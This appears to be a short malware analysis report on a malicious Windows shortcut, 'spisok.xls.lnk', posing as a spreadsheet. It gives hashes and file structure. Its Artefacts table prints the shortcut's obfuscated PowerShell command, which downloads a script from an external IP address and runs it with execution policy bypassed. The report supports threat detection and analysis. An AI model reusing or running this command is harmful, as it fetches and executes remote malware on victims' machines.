Characteristics
| Hash | Hash Value | 
|---|---|
| MD5 | 042e9517635c79baed62e6a6d68cb83e | 
| Sha1 | c1533f981962cd1932d905be4a8653896384d893 | 
| Sha256 | 560c13111a07b56734f8456637e9ba9021a84f58347bde2d412937c43b05f12f | 
| Sha384 | 53ab5de93f7685be137ce32721199f804b4633867ebf57482854a66cebb5e9bf77695b2eeaa201c048b58a0181f297fe | 
| Sha512 | c926453e22aeeafebc36326ca355b414296b60fb4ff4b16186572ce936666c958e59297cc1083fb3dba85ec9eb928d40e409a984e5c58eabbbd2985019e12a20 | 
| SSDeep | 24:xG/qifP6CnCEfPCzuikVQ4jnsNyxWaAl73lUt8GOUba//sY:x2H6yxfPKYVQ4jnkpUtbHa//sY | 
| TLSH | 50925E306F75020CF4736E3DE8769215586A347C9A32D74C1440DA9AC932A01D7B6F2E | 
File Structure
042e9517635c79baed62e6a6d68cb83e
Malicious
spisok.xls.lnk
Malicious
042e9517635c79baed62e6a6d68cb83e (19.66 KB)
No malware configuration was found at this point.
Artefacts
| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | `powershell.exe /w 1 echo LJaOYJhcYWSDpHfJQd; $a = -join (0x69,0x77,0x72 \| % {[char]$_}); .($a) -uri http:''/''/''18''5''.2''08.1''5''8''.''126/sss04n111k/draft.ps1 -OutFile draft.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:ProgramData\draft.ps1"` (Malicious) | 042e9517635c79baed62e6a6d68cb83e > spisok.xls.lnk |